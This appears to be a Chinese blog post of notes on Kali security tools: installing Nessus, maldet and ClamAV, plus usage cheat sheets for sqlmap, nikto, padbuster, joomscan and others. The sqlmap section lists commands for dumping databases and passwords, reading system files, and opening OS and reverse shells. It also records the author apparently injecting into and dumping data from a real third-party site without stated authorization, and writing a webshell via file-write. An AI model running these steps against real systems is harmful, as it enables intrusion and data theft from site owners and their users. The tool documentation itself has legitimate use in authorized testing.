Kali安装Nessus Home免费版

下载 Nessus http://www.tenable.com/products/nessus/select-your-operating-system
安装 dpkg -i Nessus-6.4.1-debian6_amd64.deb
启动 /etc/init.d/nessusd start

Selecting previously unselected package nessus.
(正在读取数据库 … 系统当前共安装有 334100 个文件和目录。)
正在解压缩 nessus (从 Nessus-6.6.0-debian6_i386.deb) …
正在设置 nessus (6.6.0) …
Unpacking Nessus Core Components…
nessusd (Nessus) 6.6.0 [build M20055] for Linux
Copyright (C) 1998 – 2016 Tenable Network Security, Inc
Processing the Nessus plugins…
[##################################################]
All plugins loaded (1sec)
– You can start Nessus by typing /etc/init.d/nessusd start
– Then go to https://0535coder:8834/ to configure your scanner

在安装完成后会出现上面url和端口,在启动后,浏览器中输入上面标红的url即可。
启动之后需要设置管理帐号和密码,设置完之后需要输入Active code(激活码)才可以进行插件的更新安装,Active code获取方法如下:访问? http://www.tenable.com/products/nessus/nessus-homefeed 进行注册,插件更新安装完毕后,即可输入之前的账号和密码登陆操作页面。
中间会发现插件更新失败,需要进入/opt/nessus/sbin目录下,执行./nessuscli update更新。
/opt/nessus/sbin/执行 ./nessuscli update all-2.0.tar.gz #https://plugins.nessus.org/v2/nessus.php?f=all-2.0.tar.gz&u=21269ffa5ea619445c5a23021bf61474&p=780401fef5e940c2625d5309bd1258cc
我没有使用离线升级包,在每次更新失败后,重启访问入口的时候会自动更新下载的补丁,再次重复执行update,中断后再次重启更新,连续三次就可以了。
使用虚拟机配置为桥接网络链接,可以ifconfig获取ip,通过win登陆 https://ip:8834
#补全、
在安装过程中选择 offline 本地安装验证、然后把获取到的2个字段分别写入 https://plugins.nessus.org/v2/offline.php 提交后可获取到认证key、填写认证key即可安装完毕、
dpkg -r nessus #卸载nessus

Linux下maldet查恶意软件

安装maldet
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -xvf maldetect-current.tar.gz
cd maldetect-1.5/
./install.sh
配置文件:/usr/local/maldetect/conf.maldet
maldet –scan-all / #扫描所有目录
maldet –report 021015-1051.3559 #查看输出报告
linux公社:http://www.linuxidc.com/Linux/2015-03/115620.htm

Centos安装 Clam AntiVirus 杀毒软件

cd /etc/yum.repos.d/ #进入yum源配置文件夹

vi dag.repo #创建yum源文件
[dag]
name=Dag RPM Repository for RHEL4
baseurl=http://ftp.riken.jp/Linux/dag/redhat/el4/en/$basearch/dag/
enabled=1
gpgcheck=0

yum -y install clamd #安装clamd

上面安装方式有时会遇到一些问题,还有另一种安装办法,是把上面的yum给分开安装了,如下:
去http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/找到合适的版本下载安装包,需要下载3个,规则为2个clamav开头的,一个是_db,一个不是的。另外一个clamd的,三个要找同一版本下载。
wget http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/clamav-db-0.98.1-1.el4.rf.x86_64.rpm
wget http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/clamav-0.98.1-1.el4.rf.x86_64.rpm
wget http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/clamd-0.98.1-1.el4.rf.x86_64.rpm
下载好了后,一个一个的安装。
rpm -ivh clamav-db-0.98.1-1.el4.rf.x86_64.rpm
rpm -ivh clamav-0.98.1-1.el4.rf.x86_64.rpm
rpm -ivh clamd-0.98.1-1.el4.rf.x86_64.rpm

还有另一个源的安装方式如下:
[dag]
name=Dag RPM Repository for Red Hat Enterprise Linux
baseurl=http://apt.sw.be/redhat/el$releasever/en/$basearch/dag
enabled=1
gpgcheck=0

yum -y install clamav* && yum -y install clamd*
在不同centos下会遇到不同的问题,汇总了以上几种安装方式,还有一种说需要安装ntp,不过没安装也没遇到问题。( yum -y install ntp)
常用命令:
启动: service clamav ?start
更新病毒库:freshclam , freshclam –daemon (保持守护进程 &)
扫描指定目录:clamscan -r /root/? #clamscan 默认查杀当前目录
扫描指定文件:clamscan /root/clamav.zip
扫描并删除带有病毒的文件: clamscan -r -–remove /usr/ #系统文件中毒,可能删除系统文件影响系统使用
将扫描结果保存: clamscan -r / -l /root/hack.log
freshclam开机启动:echo “/usr/bin/freshclam –daemon” >> /etc/rc.d/rc.local
参数:–no-summary #只显示被感染的文件。

KaLi WEB漏洞扫描工具SQLMAP使用

sqlmap是一个sql注入神器。。。

在使用sqlmap之前,一般会手工检测下,先用 ‘查看是否报错,如果报错可以进一步分析是否有sql注入漏洞,或者是对参数进行格式化过了,有助于进一步判断漏洞是否存在,否则漏洞不存在用sqlmap白浪费时间。如果是字符型的用 and ‘1’=’1 或者 and ‘1’=’2,如果是数字型的则用 and 1=1 或者 and 1=2 或者直接一步验证 -1或者+1,同时还可以尝试fuzz用/**/和–绕过空格或正则。只要发现url可能存在问题就用sqlmap跑吧,支持get、post和带cookies注入。
判断完了后,开始进入常规的sqlmap注入流程

sqlmap -u http://localhost/index.php?id=1 #查看是否有注入点
sqlmap -u http://localhost/index.php?id=1–dbs #查看数据库列表
–current –user #获取当前数据库用户
–current –db? #获取当前数据库
-D? “mysql”? -–tables #查到mysql数据库了,查看mysql数据库下的表
-D? “mysql”? -T “admin” –columns #查看admin数据库下的列
-D? “mysql”? -T “admin” -C “username,password” –dump #获取字段内容
如果想获取整张表或者整个数据库的结构和内容,可以用-D? “mysql” -dump-all 或-D? “mysql”? -T “admin” -dump-all
-dbms “mysql” #指定数据库类型
-users #列数据库用户
-U root -passwords ? #列出指定用户 数据库密码
-start 1 -stop 20 #列出指定字段,1-20 条
-cookie #登陆的情况下需要带cookies去注入
-data “id=1&action=function” #post方式提交
–proxy? “http://0535code.com:8008” #加入代理信息
-sql-shell #sql shell

-file /etc/passwd #查看文件
-os-cmd=whoami #执行系统命令
-os-shell #系统交互shell
-os-pwn #反弹shell
-dbs-o “sqlmap.log” #保存进度
-dbs -o “sqlmap.log” -resume #恢复 已保存进度
-p “id” #指定参数id
-threads 10 #线程数,最大为10
–is-dba #判断当前使用是不是DBA
–privileges #查看权限 , –roles #查看角色
–echnique “B”#使用那种SQL注入技术
–random-agent #随机的请求头 , –user-agent=AGENT #自定义请求头
–batch #自动选择,使用默认配置 , –batch-smart # 启发式自动选择
–beep #发现漏洞时发出蜂鸣声
–purge-output #清理历史记录
–flush-session #刷新当前Session , –fresh-queries #忽略session文件,重新注入
-o “sql.log” #保存进度 , -o “sqlmap.log” -resume #恢复进度
–sql-query=”select * from tables where id=1″ #执行sql语句
-level 5 #测试级别,默认为1 , –risk 3 #测试风险,默认为1
–timeout 3 #设定连接超时时间,默认30秒
–retries 3 #等待重新连接时间,默认3秒
–threads #多线程,默认1个,最多10个
–tamper “space2morehash.py” #选择使用那种污染绕过waf
–time-sec 3 #响应延迟时间,默认为5秒
-f #判断数据库类型
-b #判断数据库版本–banner
-union-check #检查是否支持union注入
-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
http://0535code.com/id/?1*.html #伪静态注入
–eval “coder” #加入python脚本代码
–batch –crawl=3 #crawl爬虫网站深度
–eta #计算注入剩余时间
–hex #使用二进制,解决字符丢失问题
–output-dir #自定义输出路径
–answers #自动选择应答
–check-waf #检查waf , –identify-waf #查找waf绕过方式
-g #使用谷歌扫描 , –gpage #谷歌扫描页数,默认100
-hpp #http参数污染
–mobile #模拟手机访问
–wizard #初级用户向导

里面是几个基本的参数使用方式,使用一下:
sqlmap -u http://www.sdjnrc.cn/Main/person.asp?uid=xx_123

Place: GET
Parameter: uid
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: uid=xx_123′ AND 7415=7415 AND ‘Uvce’=’Uvce

[23:22:55] [INFO] testing Microsoft Access
[23:22:57] [INFO] confirming Microsoft Access
[23:23:04] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP
back-end DBMS: Microsoft Access

一个基于boolean类型的盲注出来了,试过使用sqlmap拖库,如果记录值达到几百万了,会很慢,或许与我的网速也有关系,开到10个现成去跑,跑一下午不到10M数据才。没想到拿shell的办法,要想用-os-shell 需要知道web绝对路径才可以,使用的时候sqlmap会有提示,有默认的绝对路径和暴力猜解或者自定义,如果能找到网站的报错信息,可以自定义绝对路径,八成就可以拿下-os-shell了。

#如果是dba权限,而且可以爆出绝对路径可以用下面命令写入一句话 ### –is-dba
sqlmap -u http://0535code.com/test.php?id=123 –file-write /root/eval.aspx? –file-dest E:/www/test.aspx
#多线程导出所有数据库和表
sqlmap -u?http://0535code.com/test.php?id=123?–threads 10 –dump-all -v 0
#Cookies注入,当使用request获取参数时,支持GET/POST/COOKIES获取参数,只过滤了GET/POST参数,使用Cookies
sqlmap -u http://0535code.com/test.php? –cookie id=123 –level 2 –dbs

 

 

python sqlmap.py -u “http://testphp.vulnweb.com/” –batch –crawl=3  #sqlmap爬虫检测sql注入

KaLi WEB漏洞扫描工具proxystrike使用

软件介绍:http://www.edge-security.com/proxystrike.php
貌似这个神器也是类似burpsuite的,需要配置代理使用,有爬虫模块、请求报告、日志、配置等模块,目前还没有深入的研究,还是觉得burpsuite比较熟,简单的使用了下,也是图形化界面,貌似这个是pyqt写的。

proxystrike
以上是爬虫爬出一些有用的url,burpsuite用过滤器也可以实现,不过这款工具的爬虫蛮好的,这些链接可能存在sql、xxs等漏洞,敏感的url,有机会再深入用下此工具,再来完善。不知道是我的网速的原因还是软件的原因,爬的速度不快哦。

proxystrike
简单使用了下,觉得还是用burpsuite比较好,里面的功能在burpsuite基本都具有了。

KaLi WEB漏洞扫描工具padbuster使用

Use: padBuster.pl URL EncryptedSample BlockSize [options]
Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to test. Must
also be present in the URL, PostData or a Cookie
BlockSize = The block size being used by the algorithm

Options:
-auth [username:password]: 基本身份验证
-bruteforce: 执行对第一块蛮力
-ciphertext [Bytes]: 密文的中间字节(Hex-Encoded)
-cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
-encoding [0-4]: Encoding Format of Sample (Default 0)
0=Base64, 1=Lower HEX, 2=Upper HEX
3=.NET UrlToken, 4=WebSafe Base64
-encodedtext [Encoded String]: Data to Encrypt (Encoded)
-error [Error String]: 填充错误消息
-headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
-interactive: 提示确认解密字节
-intermediate [Bytes]:中间为密文字节(Hex-Encoded)
-log: 生成日志文件(创建文件夹PadBuster.DDMMYY)
-noencode: 默认不url编码的有效载荷(编码)
-noiv: Sample does not include IV (decrypt first block)
-plaintext [String]: 纯文本加密
-post [Post Data]: HTTP Post字符串
-prefix [Prefix]: 前缀字节添加到每个样本 (Encoded)
-proxy [address:port]: Use HTTP/S Proxy
-proxyauth [username:password]: 代理身份验证
-resume [Block Number]: Resume at this block number
-usebody: 为响应分析阶段使用响应正文内容
-verbose: 详细
-veryverbose: 非常详细的(仅调试)

网上有几篇文章是利用oracle的ms10-070漏洞写的,大概看了下这个工具主要是对于一些加密参数FUZZ测试的,目前没有合适的环境,或许还有更强大的功能。

 

KaLi WEB漏洞扫描工具OWASP ZAP使用

OWASP ZAP 也是有界面的,初识感觉跟burpsuite很像,都可以做很多事,很多事两款工具都可以实现,甚至配置方式也都是一样的。简述一下使用,后期使用下,尝试了拷在win下不能直接使用。
IE配置好代理后,点菜单的工具->选项->本地代理 改为浏览器设置的IE代理就好了。
 

owasp zap
owasp zap

KaLi WEB漏洞扫描工具nikto使用

Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs;超过625种服务器版本;超过230种特定服务器问题。

Option host requires an argument
-config+??????????? 使用配置文件
-Display+?????????? 开关显示文件
-dbcheck?????????? 检查数据库和语法错误的其他重要文件
-Format+????????? 保存文件 (-o) 格式
-Help??????????????? 帮助
-host+????????????? 主机
-id+????????????????? 主机身份验证使用
-list-plugins????? 列出所有可用的插件
-output+?????????? 写输出到该文件
-nossl??????????????? 禁止使用SSL
-no404????????????? 不显示4040
-Plugins+??????????运行插件列表 (default: ALL)
-port+????????????? 端口 (default 80)
-root+????????????? 该目录下所有请求
-ssl??????????????????? ssl端口
-Tuning+?????????? 扫描调优
-timeout+???????? 延时请求(default 10 seconds)
-update???????????? 升级
-Version??????????? 版本
-vhost+??????????? 主机头
Note: This is the short help output. Use -H for full help text.

网上介绍的是很强大试用下:
nikto -host 127.0.0.1 -port 8080? 或者? nikto -host 0535code.com -port 80
好像很慢的样子,不过服务器HTTP支持的方法,以及环境很快出来了,出来一个OSVDB,看了下意义不大,是一个建议,在其他web漏扫可以用下测试下,看看有那些安全隐患。

KaLi WEB漏洞扫描工具jsql使用

jsqlinjection也是java写的,跟burpsuite一样,需要jdk环境。kali下直接运行就可以看到界面了。
kali jsql
默认kali的jdk环境为1.6.0_38,jsql与该版本不兼容,需要更新下jdk版本。感觉没有sqlmap强大,果断不升级了,考虑用sqlmap吧。咦,各种工具要求的jdk环境都不同,关键是不兼容,只能有得有失了。看着界面有穿山甲的印象,想用界面的可以参考穿山甲了。
注入点:http://www.sdjnrc.cn/Main/person.asp?uid=xx_123
 

KaLi WEB漏洞扫描工具joomscan使用

?Usage:? ./joomscan.pl -u <string> -x proxy:port
-u <string>????? = joomla Url
==可选项==
-x <string:int>? = proXy to tunnel 代理到隧道
-c <string>????? = Cookie (name=value;)? cookies值
-g “<string>”??? = desired useraGent string(within “)?? userAgent
-nv????????????? = No Version fingerprinting check 没有版本的指纹识别
-nf????????????? = No Firewall detection check 不检查防火墙检测
-nvf/-nfv??????? = No version+firewall check 前面两个的组合命令
-pe ?? ??? ?? = Poke version only and Exit 版本信息,exe头叫pe,所以这里是pe不是v了
-ot????????????? = Output to Text file (target-joexploit.txt) 输出到文本文件
-oh????????????? = Output to Html file (target-joexploit.htm) 输出到html
-vu????????????? = Verbose (output every Url scan) 详细输出每个URL扫描
-sp?? ??? ?? = Show completed Percentage 显示完成百分比

?Example:? joomscan -u 0535code.com -x 127.0.0.1:8080
Check:??? joomscan check
– 检查
Update:?? joomscan update
– 更新
Download: joomscan download
– 作为一个单一的zip文件joomscan-latest.zip,下载最新版本
Defense:? joomscan defense
– 给一个防御性的说明。
About:??? joomscan story
– 关于joomscan.
Read:??? joomscan read DOCFILE
-说明

这款工具只针对 joomlacms 有效,不是通用的扫描器。目前没遇到过这款CMS,国外的貌似,收藏了。